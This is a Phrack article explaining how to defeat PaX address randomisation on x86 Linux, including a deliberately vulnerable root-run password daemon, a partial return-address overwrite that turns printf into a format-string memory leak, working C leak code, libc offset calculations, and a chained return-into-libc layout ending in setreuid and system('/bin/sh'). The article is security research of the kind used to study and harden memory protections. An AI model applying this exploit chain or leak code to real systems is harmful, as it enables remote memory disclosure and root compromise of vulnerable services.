|
==Phrack Inc.== Volume 0x0b, Issue 0x3b, Phile #0x09 of 0x12 |=------------------=[ Bypassing PaX ASLR protection ]=------------------=| |=-----------------------------------------------------------------------=| |=------------=[ anonymous author <p59_09@author.phrack.org> ]=----------=| 0. Introduction a. What is PaX and what it does b. Known attacks against old PaX implems c. What changed since ret-into-dl-resolve() 1. What you ever wanted to know about PaX a. Paging basics b. PaX foundations (PAGEEXEC feature) c. Address Space Layout Randomization Layout (ASLR) - Stack ASLR - Libraries ASLR - Executable PT_LOAD double mapping technique - ET_EXEC to ET_DYN full relinking technique d. Last enforcements 2. ASLR weaknesses a. EIP partial overwrite b. Generating information leaks 3. Understanding the exploitation step by step a. Global flow understanding using gdb b. Examining the remote stack c. Verify printf relative offset using elfsh d. Guess functions and parameters absolute addresses 4. Exploitation success conditions a. Looking for exploitable stack based overflows b. Looking for leak functions c. The frame pointer problem and workaround d. Discussion about segvguard 5. The code a. Sample target b. ret-into-printf info leak code 6. Referenced papers and projects -------[ 0. Introduction [a] PaX, stands for PageEXec, is a linux kernel patch protection against buffer overflow attacks . It is younger than Openwall (PaX has been available for a year and a half now) and takes profit from the processor lowlevel paging mechanism in order to detect injected code execution . It also make return into libc exploits very hard to accomplish . This patch is very easy to use and can be downloaded on [1] , so as the tiny chpax tool used to configure PaX on a per file basis . For accomplishing its task, PaX hooks two OS mechanisms : - Refuse code execution on writable pages (PAX_PAGEEXEC option) . - Randomize mmap()'ed library base address to make return into libc harder . [b] Some years ago, Nergals came with his return into plt technique (ELF specific) allowing him to bypass the mmap() protection (implemented in OpenWall [2] at this time) . The technique has been very well described in a recent paper [3] and wont be developped again in this article . [c] In the last months, the PaX team released et_dyn.zip, showing us how to relink executable (ET_EXEC ELF objects) into ET_DYN objects, so that the main object base address would also be randomized, and Nergal's return-into-plt attack blocked . Unfortunately, most people think it is a real pain to relink all sensible binaries . The PaX team decided to release a new version of the patch, accomplishing the same task without needing relinking . Since this patch represents the latest improvement concerning buffer overflow protection, a new study was necessary . We will demonstrate that in certain conditions, it is still possible to exploit stack based buffer overflows protected by PaX with all options actived, including the new ET_EXEC binary base address randomizing . We will show that we can reduce the problem to a standard return-into-libc exploitation . Heap overflows wont be developped, but it might also be possible to exploit them in an ASLR environment using a derived technique . -------[ 1. What you ever wanted to know about PaX If you dont care about PaX itself, please pass this paragraph and go read paragraph 2 now :) [a] Paging basics On INTEL Pentium processors, userland pages are 4Ko big . The design for 32 bits linear addresses (when pagination is enabled, which is mandatory if protected mode is enabled) is : --------------------------------------- | | | | --------------------------------------- ^ ^ ^ | | |_____ Page offset (12 bits) | | | |_____ Page table entry index (10 bits) | |_______ Page directory entry index (10 bits) If no extra options (like PSE or PAE) are actived, the processor handle a 3 level paging, using 2 intermediary tables called the page directory and the page table . On Linux, segmentation protection is not used by default (segment base address is 0 everywhere, and segment limit is FFFFF everywhere), it means that virtual address space and linear address space are the same . For extended information about the INTEL Pentium protected mode, please refers to the Documentation reference [4], paragraph 3.6.2 describes paging basics, including PDE and PTE explainations . For instance, linear address 0804812C can be decomposed like : 08 + two high bits in the third nibble '0' : Page directory entry index two low bits in the third nibble '0' + 48 : Page table entry index 12C (12 low bits) : Page offset [b] PAGEEXEC option There is a documentation on the PaX website [1] but as written on the webpage, it is quite outdated . I will try (thanks to the PaX team) to explain PaX mechanisms again and giving some details for our purpose : First, PaX hook your page fault handler . This is an routine executed each time you have an access problem to a memory page . Linux pages are all 4Ko on the platform we are interrested in . This fault can be due to many reasons : - Presence checking (not all 4Ko zone are mapped in memory at this moment, some pages may be swapped for instance and we want to unswap it) - Supervisor check (the page has its supervisor bit set, only the kernel can access it, normal behavior is to send SIGSEGV) - Access mode check : try to write and not allowed, try to read and not allowed, normal behaviour is send SIGSEGV . - Other reasons described in [4] . Since there is no dedicated bit on PDE (page directory entry) or PTE (page table entry) to control page execution, the PaX code has to emulate it, in order to detect inserted shellcode execution in the flow . Every protected pages tables entries (PTE) are set to supervisor . Protected pages include everything (stack, heap, data pages) except the original executable code (executable PT_LOAD program header for each process object) . Consequences are quite directs : each time we access one of these pages, the page fault handler is executed because the supervisor bit has been detected during the linear-to-physical address translation (so called page table walk) . PaX can control access to the page in its PF handling code . What PaX can choose to do at this time : - If it is a read/write access, consider it as normal if original page flags allows it and do not kill the task . For this to work, the PaX code has to temporary fill the corresponding PTE to a user one (remember that the page has been protected with the supervisor bit whereas it contains userland code), then do access on the page to fill the dtlb, and set the page as supervisor again . This will result in further data access to the page not beeing filtered by PF since it will use the dtlb cached value and not perform a page table walk again ;) - If it is an execution access, kill the task and write the exploitation attempt in the logs . [c] ASLR => Stack ASLR bash$ export EGG="/bin/sh" bash$ cat test.c <++> DHagainstpax/test.c !187b540a #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv, char **envp) { char *str; str = getenv("EGG"); printf("str = %p (%s) , envp = %p, argv = %p, delta = %u \n", str, str, envp, argv, (u_int) str - (u_int) argv); return (0); } <--> bash$ ./a.out str = 0xb7a2aece (/bin/sh) , envp = 0xb7a29bbc, argv = 0xb7a29bb4, delta = 4890 bash$ ./a.out str = 0xb9734ece (/bin/sh) , envp = 0xb973474c, argv = 0xb9734744, delta = 1930 bash$ ./a.out str = 0xba36cece (/bin/sh) , envp = 0xba36c73c, argv = 0xba36c734, delta = 1946 bash$ chpax -v a.out a.out: PAGE_EXEC is enabled, trampolines are not emulated, mprotect() is restricted, mmap() base is randomized, ET_EXEC base is randomized bash$ After investigation, it seems like the stack address is randomized on the 28 low bits, but in 2 times, which explain why the EGG environment variable is always on the same page offset (ECE) . First, bits 12 to 27 get randomized, then environment is copied on the stack, finally the page offset (bits 0 to 11) is randomized using some %esp padding . Note that low 4 bits are always 0 because the kernel enforces 16 bytes alignement after the %esp pad . This is not a big vulnerability and you dont need it to manage ASLR exploitation, even if it might help in some cases . It may be corrected in the next PaX version however . => Libraries ASLR bash$ cat /proc/self/maps | grep libc 409da000-40ae1000 r-xp 00000000 03:01 833281 /lib/libc-2.2.3.so 40ae1000-40ae7000 rw-p 00106000 03:01 833281 /lib/libc-2.2.3.so bash$ cat /proc/self/maps | grep libc 4e742000-4e849000 r-xp 00000000 03:01 833281 /lib/libc-2.2.3.so 4e849000-4e84f000 rw-p 00106000 03:01 833281 /lib/libc-2.2.3.so bash$ cat /proc/self/maps | grep libc 4b61b000-4b722000 r-xp 00000000 03:01 833281 /lib/libc-2.2.3.so 4b722000-4b728000 rw-p 00106000 03:01 833281 /lib/libc-2.2.3.so bash$ Library base addresses get randomized on 16 bits (bits 12 to 27) . Page offset (low 12 bits) is not randomized, the high nibble is not randomized as well (always '4' to allow big library mapping, this nibble wont change unless a very big zone is mapped) . We already note that there's no NUL bytes in the library addresses, the PaX team choosed to randomize address on 16 bits instead . => Executable PT_LOAD double mapping technique In order to block classical return-into-plt exploits, we can use two mechanisms . The first one consists in automatically remapping the executable program header (containing the binary .plt) and set the old (original) mapping as non-executable using the PAGEXEC option . For obscure reasons linked to crt*.o PIC code, vm_areas framing the remapped region have to share the same physical address than vm_areas framing the original region but that's not important for the presented attack . The data PT_LOAD program header is not moved because the remapped code may contains absolute references to it . This is a vulnerability because it makes .got accessible in rw mode . We could for instance poison the table using partial entry overwrite (overwriting only 1 or 2 bytes in the entry) but this wont be discussed in the paper since this attack is derived from [5] and would require similar conditions . Moreover, the remapping option is time consuming and we prefer using full relinking . => ET_EXEC to ET_DYN full relinking technique Now it comes more tricky ;p Maybe you already noticed executable libraries in your tree . These objects are ET_DYN (shared) and contains a valid entry point and valid interpreter (.interp) section . libc.so is very good examples : bash$ /lib/libc.so.6 GNU C Library stable release version 2.2.3, by Roland McGrath et al. (...) Report bugs using the `glibcbug' script to <bugs@gnu.org>. bash$ bash$ /usr/lib/libncurses.so Segmentation fault bash$ If we look closer at these libraries, we can see : bash$ objdump -x /lib/libc.so.6 | grep INTERP INTERP off 0x001065f2 vaddr 0x001065f2 paddr 0x001065f2 align 2**0 bash$ objdump -x /usr/lib/libncurses.so | grep INTERP bash$ A sample relinking package called et_dyn.zip can be obtained on the PaX website, it shows how to perform relinking for your own binaries . For this, you just have to request a PT_INTERP segment to be created (not the case by default except for libc) and have a valid entry point function (a main function is enough) . This relinking will result in all zone (code and data program header) beeing mapped as shared libraries, with base address randomized using the standard PaX mmap() mechanism . This is the protection we are going to defeat . [d] Last enforcements PaX also prevents from mprotect() based attacks, when mprotect is used to regain execution rights on a shellcode inserted in the stack for instance . It matters because in case we are able to guess the mprotect() absolute address, we wont be able to abuse it . Trampoline emulation is not explained because it doesnt matter for our purpose . -------[ 2. ASLR weaknesses [a] As we saw, page offset is 12 bits long . It means that a one byte EIP overflow is not risky because we know that the modified return address will still point in the same page, since the INTEL x86 architecture is little endian . Partial overflows have not been studied much, except for the alphanumeric shellcode purpose [6] and for fp overwriting [7] . Using this technique we can replay or bypass part of the original code . What is more interresting for us is replaying code, in our case, replaying buffer overflows, so that we'll be able to control the process execution flow and replay vulnerable code as much as needed . We start thinking about some brute forcing mechanism but we want to avoid crashing the program . [b] What we have to do against PaX ASLR is retreiving information about the process, more precisely about the process address space . I'll ask you to have a look at this sample vulnerable code before saying the whole technique : <++> DHagainstpax/pax_daemon.c !d75c8383 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define NL '\n' #define CR '\r' #define OKAY_PASS "evil" #define FATAL(str) { perror(str); exit(-1); } int verify(char *pass); int do_auth(); char pass[48]; int len; int main(int argc, char **argv) { return (do_auth()); } /* Non-buggy passwd based authentication */ int do_auth() { printf("Password: "); fflush(stdout); len = read(0, pass, sizeof(pass) - 1); if (len <= 0) FATAL("read"); pass[len] = 0; if (!verify(pass)) { printf("Access granted .\n"); return (0); } printf("You loose !"); fflush(stdout); return (-1); } /* Buggy password check (stack based overflow) */ int verify(char *pass) { char filtered_pass[32]; int i; bzero(filtered_pass, sizeof(filtered_pass)); /* this protocol is a pain in the ass */ for (i = 0; pass[i] && pass[i] != NL && pass[i] != CR; i++) filtered_pass[i] = pass[i]; if (!strcmp(filtered_pass, OKAY_PASS)) return (0); return (-1); } <--> This is a tiny password based authentication daemon, running throught inetd or at the command line . For inetd use, here is the line to add in inetd.conf : 666 stream tcp nowait root /usr/sbin/tcpd \ /home/anonymous/DHagainstpax/paxtestd Just replace the command line with your own path for the daemon, inform inetd about it, and verify that it works well : bash$ pidof inetd 99 bash$ kill -HUP 99 bash$ netstat -a -n | grep 666 tcp 0 0 0.0.0.0:666 0.0.0.0:* LISTEN bash$ This is a quite dumb code printing a password prompt, waiting for an input, and comparing it with the valid password, filtering CR and NL caracters . bash$ ./paxtestd Password: toto You loose ! bash$ ./paxtestd Password: evil Access granted . bash$ For bored people who think that this code cant be found in the wild, I would just argue that this work is proof of concept . Exploitation conditions are generalized in paragraph 4 . We can easily idenfify a stack based buffer overflow vulnerability in this daemon, since the filtered_pass[] buffer is filled with the pass[] buffer, the copy beeing filtered in a 'for' loop with a missing size checking condition . [b] What can we do to exploit this vulnerability in a PaX full random address space protected environment ? If we look closed, here is what we can see : (...) printf("Password: "); fflush(stdout); len = read(0, pass, sizeof(pass) - 1); if (len <= 0) FATAL("read"); pass[len] = 0; if (!verify(pass)) { (...) The assembler dump (slighly modified to match symbol names cause objdump symbol matching sucks :) for do_auth() looks like that : 804858c: 55 push %ebp 804858d: 89 e5 mov %esp,%ebp 804858f: 83 ec 08 sub $0x8,%esp 8048592: 83 c4 f4 add $0xfffffff4,%esp 8048595: 68 bc 86 04 08 push $0x80486bc 804859a: e8 5d fe ff ff call 80483fc <printf> 804859f: 83 c4 f4 add $0xfffffff4,%esp 80485a2: ff 35 00 98 04 08 pushl 0x8049800 80485a8: e8 1f fe ff ff call 80483cc <fflush> 80485ad: 83 c4 20 add $0x20,%esp 80485b0: 83 c4 fc add $0xfffffffc,%esp 80485b3: 6a 2f push $0x2f 80485b5: 68 20 98 04 08 push $0x8049820 80485ba: 6a 00 push $0x0 80485bc: e8 6b fe ff ff call 804842c <read> 80485c1: 89 c2 mov %eax,%edx 80485c3: 89 15 50 98 04 08 mov %edx,0x8049850 80485c9: 83 c4 10 add $0x10,%esp 80485cc: 85 d2 test %edx,%edx 80485ce: 7f 17 jg 80485e7 ; if (len <= 0) 80485d0: 83 c4 f4 add $0xfffffff4,%esp 80485d3: 68 c7 86 04 08 push $0x80486c7 80485d8: e8 df fd ff ff call 80483bc <perror> 80485dd: 83 c4 f4 add $0xfffffff4,%esp 80485e0: 6a ff push $0xffffffff 80485e2: e8 35 fe ff ff call 804841c <exit> 80485e7: b8 20 98 04 08 mov $0x8049820,%eax 80485ec: c6 04 02 00 movb $0x0,(%edx,%eax,1) 80485f0: 83 c4 f4 add $0xfffffff4,%esp 80485f3: 50 push %eax 80485f4: e8 27 ff ff ff call 8048520 <verify> 80485f9: 83 c4 10 add $0x10,%esp More precisely: (...) 8048595: 68 bc 86 04 08 push $0x80486bc 804859a: e8 5d fe ff ff call 80483fc <printf> (...) 80485f4: e8 27 ff ff ff call 8048520 <verify> 80485f9: 83 c4 10 add $0x10,%esp The 'call printf' and 'call verify' are cleary on the same page, we know this because the 20 high bits of their respective linear address are the same . It means that we are able to return on this instruction using a one (or two) byte(s) eip overflow . If we think about the stack state, we can see that printf() will be called with parameters already present on the stack, i.e. the verify() parameters. If we control the first parameter of this function, we can supply a random format string to the printf function and generate a format bug, then call the vulnerable function again, this way we hope resuming the problem to a standard return into libc exploit, examining the remote process address space, more precisely the remote stack, in particular return addresses. Lets prepare a 37 byte long buffer (32 bytes buffer, 4 byte frame pointer, and one low EIP byte) for the password input : "%001$08u \x9a" "%002$08u \x9a" "%003$08u \x9a" "%iii$08u \x9a" These format strings will display the 'i'th unsigned integer from the remote stack . Using this we can retreive interresting values using leak.c given at the end if this paper . For those who are not that familiar with format bugs, this will read the i'th pushed parameter on the stack (iii$) and print it as an unsigned integer (%u) on eight characters (8), padding with '0' char if needed . Format strings are deeply explained in the printf(3) manpage . Note that the 37th byte \x9a is the low byte in the 'call printf' linear address . Since the caller is responsible for parameters popping, they are still present on the stack when the verify function returns ('ret') and when the new return address is pushed by the 'call printf' so that the stack pointer is well synchronized . bash-2.05$ ./runit [RECEIVED FROM SERVER] *Password: * Connected! Press ^C to launch : Starting remote stack retreiving ... Remote stack : 00000000 08049820 0000002F 00000001 472ED57C 4728BE10 B9BDB84C 4727464F 080486B0 B9BDB8B4 472C6138 473A2A58 47281A90 B9BDB868 B9BDB888 472B42EB 00000001 B9BDB8B4 B9BDB8BC 0804868C bash-2.05$ In this first example we read 80 bytes on the stack, reading 4 bytes per 4 bytes, replaying 20 times the overflow and provoking 20 times a format bug, each time incrementing the 'iii' counter in the format string (see below) . As soon as we know enough information to perform a return into libc as described in [3], we can stop generating format bugs in loop and fully erase eip (and the parameters standing after eip on the stack) and perform standard return-into-libc exploitation . We can also choose to exploit the program using the generated format bugs as described it [8] or [9] . -------[ 3. Understanding the exploitation step by step The goal is to guess libc addresses so that we can perform a standard return into libc exploitation . For that we will use relative offsets from the retaddr we can read on the stack . This paragraph has been done to help you in your first ASLR exploitation . [a] Let's understand better the execution flow using a debugger. This is what we can see in the gdb debugging session for the vulnerable daemon, at this moment waiting for its first input : * WITHOUT ET_EXEC base address randomization (gdb) bt #0 0x400dff14 in __libc_read () at __libc_read:-1 #1 0x4012ca58 in __DTOR_END__ () from /lib/libc.so.6 #2 0x0804864f in main (argc=1, argv=0xbffffd54) at pax_daemon.c:26 #3 0x4003e2eb in __libc_start_main (main=0x8048634 <main>, argc=1, ubp_av=0xbffffd54, init=0x8048374 <_init>, fini=0x804868c <_fini>, rtld_fini=0x4000c130 <_dl_fini>, stack_end=0xbffffd4c) at ../sysdeps/generic/libc-start.c:129 (gdb) * WITH ET_EXEC base address randomization (gdb) bt #0 0x4365ef14 in __libc_read () at __libc_read:-1 #1 0x436aba58 in __DTOR_END__ () from /lib/libc.so.6 #2 0x4357d64f in ?? () #3 0x435bd2eb in __libc_start_main (main=0x8048634 <main>, argc=1, ubp_av=0xb5c36cf4, init=0x8048374 <_init>, fini=0x804868c <_fini>, rtld_fini=0x4358b130 <_dl_fini>, stack_end=0xb5c36cec) at ../sysdeps/generic/libc-start.c:129 (gdb) As you can see, the symbol table is not synchronized anymore with the memory dump so that we cant rely on the resolved names to debug . Note that we will dispose of a correct symbol table in case the ET_EXEC binary object has been relinked into a ET_DYN one, has explained in paragraph 1, part c . [b] Using the exploit, here is what we can see if we examine the stack with or without the ET_EXEC rand option : bash$ ./runit [RECEIVED FROM SERVER] *Password: * Connected! Press ^C to launch : Starting remote stack retreiving ... Remote stack (with ET_EXEC rand enabled) : 00000000 08049820 0000002F 00000001 482D157C 4826FE10 BDDB44DC 4825864F 080486B0 BDDB4544 482AA138 48386A58 48265A90 BDDB44F8 BDDB4518 482982EB 00000001 BDDB4544 BDDB454C 0804868C If we disable the ET_EXEC rand option, here is what we see : bash$ ./runit (...) Remote stack (with ET_EXEC rand disabled) : 00000000 08049820 0000002F 00000001 4007757C 40015E10 BFFFFCEC 0804864F 080486B0 BFFFFD54 40050138 4012CA58 4000BA90 BFFFFD08 BFFFFD28 4003E2EB 00000001 BFFFFD54 BFFFFD5C 0804868C As we want to do a return into libc, address pointing in the libc are the most interresting . What we are looking for is the main() return address pointing in the remapped instance of the __libc_start_main function, in the .text section in the libc's address space . Here is how to interpret the stack dump : 00000000 (...) 08049820 0000002F 00000001 435F657C 43594E10 B5C36C8C do_auth frame pointer 4357D64F do_auth() return address 080486B0 do_auth parameter ('pass' ptr) B5C36CF4 435CF138 436ABA58 4358AA90 B5C36CA8 B5C36CC8 main() frame pointer 435BD2EB main() return address 00000001 argc B5C36CF4 argv B5C36CFC envp 0804868C (...) [c] Now let's look at the libc binary to know the relative address for functions we are interrested in . For that we'll use the regex option in ELFsh [7] : bash-2.05$ elfsh -f /lib/libc.so.6 -sym ' strcpy '\|' exit '\|' \ setreuid '\|' system ' [SYMBOL TABLE] [4425] 0x750d0 strcpy type: Function size: 00032 bytes => .text [4855] 0x48870 system type: Function size: 00730 bytes => .text [5670] 0xc59b0 setreuid type: Function size: 00188 bytes => .text [6126] 0x2efe0 exit type: Function size: 00248 bytes => .text bash$ elfsh -f /lib/libc.so.6 -sym __libc_start_main [SYMBOL TABLE] [6218] 0x1d230 __libc_start_main type: Function size: 00193 bytes => .text bash$ [d] As the main() function return into __libc_start_main , lets look precisely in the assembly code where main() will return . So, we would know the relative offset between the needed function address and the address of the 'call main' instruction . This code is located in the libc. This dump has been taken from my default SlackWare libc.so.6 for which you may not need to change relative file offsets in the exploit . 0001d230 <__libc_start_main>: 1d230: 55 push %ebp 1d231: 89 e5 mov %esp,%ebp 1d233: 83 ec 0c sub $0xc,%esp (...) 1d2e6: 8b 55 08 mov 0x8(%ebp),%edx 1d2e9: ff d2 call *%edx 1d2eb: 50 push %eax 1d2ec: e8 9f f9 ff ff call 1cc90 <GLIBC_2.0+0x1cc90> (...) Instructions following this last 'call 1cc90' are 'nop nop nop nop', just headed by the 'Letext' symbol, but thats not interresting for us . Because the libc might have been recompiled, it may be possible to have different relative offsets for your own libc built and it would be very difficult to guess absolute addresses just using the main() return address in this case. Of course, if we have a binary copy of the used library (like a .deb or .rpm libc package), we can predict these offsets without any problem . Let's look at the offsets for my libc version, for which the exploit is based . We know from the 'bt' output (see above) that the main address is the first __libc_start_main() parameter . Since this function has a frame pointer, we deduce that 8(%ebp) contains the main() absolute address . The __libc_start_main function clearly does an indirect call through %edx on it (see the last 3 instructions) : 1d2e6: 8b 55 08 mov 0x8(%ebp),%edx 1d2e9: ff d2 call *%edx We deduce that the return address we read in the process stack points on the intruction at file offset 1d2eb : 1d2eb: 50 push %eax We can now calculate the absolute address we are looking for : . main() ret-addr : file offset 0x1d2eb, virtual address 0x4003e2eb . system() : file offset 0x48870, virtual address unknown . setreuid() : file offset 0xc59b0, virtual address unknown . exit() : file offset 0x2efe0, virtual address unknown . strcpy() : file offset 0x750d0, virtual address unknown What we deduce from this : . system() addr = main ret + (system offset - main ret offset) = 4003e2eb + (48870 - 1d2eb) = 4003e2eb + 2B585 = 40069870 . setreuid() addr = main ret + (setreuid offset - main ret offset) = 4003e2eb + (c59b0 - 1d2eb) = 4003e2eb + a86c5 = 400e69b0 . exit() addr = main ret + (exit offset - main ret offset) = 4003e2eb + (2efe0 - 1d2eb) = 4003e2eb + 11cf5 = 4004ffe0 . strcpy() addr = 4003e2eb + (750d0 - 1d2eb) = 4003e2eb + 57de5 = 400960d0 We needs some more offsets to perform a chained return into libc and insert NUL bytes as explained in Nergal's paper : - A pointer on the setreuid() parameter reposing on the stack, to be used as a dst strcpy parameter (we need to nullify it) : do_auth fp + 28 = B5C36CC8 + 1C = B5C36CE4 The setreuid parameter address (reposing on the stack) can be found using the do_auth() frame pointer value (B5C36CC8 in the stack dump), or if there is no frame pointer, using whatever stack variable address we can guess . - A pointer on a NUL byte to be used as a src strcpy parameter (let's use the "/bin/sh" final byte address) main ret addr + (string offset - main ret offset) + strlen("/bin/sh") = 4003e2eb + (fcc19 - 1d2eb) + 7 = 4003e2eb + df92e + 7 = 4011dc19 + 7 = 4011dc20 - A "/bin/sh" string with predictable absolute address for the system() parameter (we will find one in the libc's .rodata section which is part of the same zone (has the same base address) than libc's .text) main ret addr + (string offset - main ret offset) = 4003e2eb + (fcc19 - 1d2eb) = 4003e2eb + df92e = 4011dc19 bash$ elfsh -f /lib/libc.so.6 -X '.rodata' | grep -A 1 '/bin/' nbits.333 + 152 0xfcc18 : 00 2F 62 69 6E 2F 73 68 ./bin/sh nbits.333 + 160 0xfcc20 : 00 00 00 00 00 00 00 00 ........ -- zeroes + 19 0xff848 : 73 68 00 2F 62 69 6E 2F sh./bin/ zeroes + 27 0xff850 : 73 68 00 00 00 00 00 00 sh...... -- zeroes + 560 0xffad0 : 68 00 2F 62 69 6E 2F 73 h./bin/s zeroes + 568 0xffad8 : 68 00 74 6D 70 66 00 77 h.tmpf.w bash$ - A 'pop ret' and 'pop pop ret' sequences somewhere in the code, in order to do %esp lifting (we will find many ones in libc's .text) For 'pop ret' sequence : bash$ objdump -d --section='.text' /lib/libc.so.6 | grep ret -B 1 | \ grep pop -A 1 (...) 2c519: 5a pop %edx 2c51a: c3 ret (...) For 'pop pop ret' sequence : bash$ objdump -d --section='.text' /lib/libc.so.6 | grep ret -B 3 | \ grep pop -A 3 | grep -v leave (...) 4ce25: 5e pop %esi 4ce26: 5f pop %edi 4ce27: c3 ret (...) Note: be careful and check if the addresses are contiguous for the 3 intructions because the regex I use it not perfect for this last test . Here is how you have to fill the stack in the final overflow (each case is 4 bytes lenght, the first dword is the return address of the vulnerable function) : 0: | strcpy addr | 'pop; pop; ret' addr | strcpy argv1 | strcpy argv2 | 16: | strcpy addr | 'pop; pop; ret' addr | strcpy argv1 | strcpy argv2 | 32: | strcpy addr | 'pop; pop; ret' addr | strcpy argv1 | strcpy argv2 | 48: | strcpy addr | 'pop; pop; ret' addr | strcpy argv1 | strcpy argv2 | 64: | setreuid addr | 'pop; ret' addr |setreuid argv1| system addr | 80: | exit addr | "/bin/sh" addr | ??? DONT ??? | ??? CARE ??? | We need to overflow at least 84 bytes after the original return address . This is not a problem . The 4 first return-into-strcpy are used to nullify the setreuid argument, which has to be a 0x00000000 dword . -------[ 4. Exploitation conditions The attack suffers from many known limitations as you will see . [a] Looking for exploitable stack based overflows Not all overflows can be exploited like this . memcpy() and strncpy() overflows are vulnerable, so as byte-per-byte overflows . Overflow involving functions whoose behavior is to append a NUL byte are not vulnerable, except if we can find a 'call printf' instruction whoose absolute address low byte is NUL . [b] Looking for leak functions We can use printf() to leak information about the address space . We can also return into send() because send() linux implementation use sys_socketcall and takes only one parameter on the stack, the parameter array absolute address . 000cbb70 <__libc_send>: cbb70: 89 da mov %ebx,%edx cbb72: b8 66 00 00 00 mov $0x66,%eax cbb77: bb 09 00 00 00 mov $0x9,%ebx cbb7c: 8d 4c 24 04 lea 0x4(%esp,1),%ecx cbb80: cd 80 int $0x80 Moreover, send() has a very good error handling code so we will not crash the process if we try to read some unmapped process area . From the send(3) manual page : ERRORS (...) EBADF An invalid descriptor was specified. ENOTSOCK The argument s is not a socket. EFAULT An invalid user space address was specified for a parameter. (...) We may want to return-into-write or return-into-any_output_function if there is no printf and no send somewhere near the original return address, but these attacks would be quite hard to perform since we would have to control many of the vulnerable function parameters . [c] The frame pointer problem and workaround The technique also suffers from the same limitation than klog's fp overwriting [7] . If the frame pointer register (%ebp) is used between the 'call printf' and the 'call vuln_func', the program will crash and we wont be able to call vuln_func() again . Programs like: /* Non-buggy passwd based authentication */ int do_auth() { int len; printf("Password: "); fflush(stdout); len = read(0, pass, sizeof(pass) - 1); if (len <= 0) FATAL("read"); pass[len] = 0; if (!verify(pass)) (...) are not exploitable using a return into libc because 'len' will be indexed through %ebp after the read() returns . If the program is compiled without frame pointer, such a limitation does not exist . [d] Discussion about segvguard Segvguard is a tool coded by Nergal described in his paper [3] . In short, this tool can be used to forbid the executable relaunching if it crashed too much times . If segvguard is used, we are definitely asked to find the output function in the very near (+- 256 bytes) or the original return address . If segvguard is not used, we can try a two byte EIP overflow and brute force the 4 randomized bits in the high part of the second overflowed byte . This way, we'll be able to return on a farer 'call printf' instruction, increasing our chances . -------[ 5. The code : DHagainstpax I would like to sincerely congratulate the PaX team because they own me (who's the ingratefull pig ? ;) and because they've done the best work I have ever seen in this field since Openwall . Thanks go to theowl, klog, MaXX, Nergal, kalou and korty for discussions we had on this issue . Special thanks go to devhell labs 0 : - ] Shoutouts to #fr people (dont feed the troll) . May you all guyz pray for peace . <++> DHagainstpax/leak.c !78040134 /* * * Info leak code against PaX + ASLR protection . * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <signal.h> #define FATAL(str) { perror(str); exit(-1); } #define PORT_NUM 666 #define SERVER_IP "127.0.0.1" #define BUF_SIZ 37 #define FMT "%%%03u$08u \x9a" #define RETREIVED_STACKSIZE 20 u_int remote_stack[RETREIVED_STACKSIZE]; void sigint_handler(int sig) { printf("Starting remote stack retreiving ... "); } int main(int argc, char **argv) { char buff[256]; struct sockaddr_in addr; int sock; int len; u_int cnt; u_char fmt[BUF_SIZ + 1]; if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) FATAL("socket"); bzero(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(PORT_NUM); addr.sin_addr.s_addr = inet_addr(SERVER_IP); if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) FATAL("connect"); len = read(sock, buff, sizeof(buff) - 1); buff[len] = 0; printf("[RECEIVED FROM SERVER] *%s* \n", buff); signal(SIGINT, sigint_handler); printf("Connected! Press ^C to launch : "); fflush(stdout); pause(); for (cnt = 0; cnt < RETREIVED_STACKSIZE; cnt++) { snprintf(fmt, sizeof(fmt), FMT, cnt); write(sock, fmt, BUF_SIZ); len = read(sock, buff, sizeof(buff) - 1); buff[len] = 0; sscanf(buff, "%u", remote_stack + cnt); } printf("\n\nRemote stack : \n"); for (cnt = 0; cnt < RETREIVED_STACKSIZE; cnt += 4) printf("%08X %08X %08X %08X \n", remote_stack[cnt], remote_stack[cnt + 1], remote_stack[cnt + 2], remote_stack[cnt + 3]); puts(""); return (0); } <--> <++> DHagainstpax/Makefile !d055b5f3 ## ## Makefile for DHagainstpax ## SRC1 = pax_daemon.c OBJ1 = pax_daemon.o NAM1 = paxtestd SRC2 = leak.c OBJ2 = leak.o NAM2 = runit CC = gcc CFLAGS = -Wall -g3 #-fomit-frame-pointer OPT = $(CFLAGS) DUMP = objdump -d --section='.text' DUMP2 = objdump --syms GREP = grep DUMPLOG = $(NAM1).asm CHPAX = chpax -X all : fclean leak vuln vuln : $(OBJ1) $(CC) $(OPT) $(OBJ1) -o $(NAM1) @echo "" $(CHPAX) $(NAM1) $(DUMP) $(NAM1) > $(DUMPLOG) @echo "" @echo "Try to locate 'call printf' ;) 5th call above 'call verify'" @echo "" $(GREP) "_init\|verify" $(DUMPLOG) | $(GREP) 'call' @echo "" $(DUMP2) $(NAM1) | grep printf @echo "" leak : $(OBJ2) $(CC) $(OPT) $(OBJ2) -o $(NAM2) clean : rm -f *.o *\# \#* *~ fclean : clean rm -f $(NAM1) $(NAM2) <--> -------[ 6. References [1] PaX homepage The PaX team http://pageexec.virtualave.net [2] The OpenWall project Solar Designer http://openwall.com/linux/ [3] Advanced return-into-lib(c) exploits Nergal http://phrack.org/show.php?p=58&a=4 [4] Pentium refefence manual 'system programming guide' http://developer.intel.com/design/Pentium4/manuals/ [5] Bypassing stackguard and stackshield Kil3r/Bulba http://phrack.org/show.php?p=56&a=5 [6] Writing alphanumeric shellcodes rix http://phrack.org/show.php?p=57&a=15 [7] Frame pointer overwriting klog http://phrack.org/show.php?p=55&a=8 [8] Bypassing PaX ASLR using format bugs anonymous (not widely released but outdated now) [9] Exploiting format bugs scut http://team-teso.net/articles/formatstring/ [10] The ELFsh project devhell labs http://www.devhell.org/~mayhem/projects/elfsh/ |=[ EOF ]=---------------------------------------------------------------=|